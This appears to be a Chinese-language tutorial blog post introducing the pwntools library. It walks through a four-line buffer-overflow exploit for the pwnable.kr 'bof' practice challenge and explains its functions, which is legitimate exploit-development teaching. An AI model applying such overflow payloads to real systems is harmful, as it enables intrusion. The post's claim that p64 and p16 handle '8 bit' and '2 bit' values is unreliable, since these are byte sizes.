pwntools學習記錄(一)
阿新 • • 發佈:2018-12-18
參考文章:https://bbs.pediy.com/thread-247217.htm
我們先來就著上次寫的bof的exp來講解一下
from pwn import *
c = remote("pwnable.kr",9000)
c.sendline("AAAA"*13+p32(0xcafebabe))
c.interactive()
remote("一個域名或者ip地址", 埠)
會連線到我們指定的地址及埠。 然後該函式會返回remote物件
remote物件主要用來進行對遠端主機的輸入輸出. 它有如下幾個方法:
send(payload)
傳送payload
sendline(payload)
sendafter(some_string, payload)
接收到 some_string 後, 傳送你的 payloadrecvn(N)
接受 N(數字) 字元recvline()
接收一行輸出recvlines(N)
接收 N(數字) 行輸出recvuntil(some_string)
接收到 some_string 為止
在第三行中,p32()
可以讓我們轉換整數到小端序格式.p32
轉換4
位元組. p64
和 p16
則分別轉換 8 bit
和 2 bit
數字
c.sendline
將我們的payload傳送到遠端主機
c.interactive()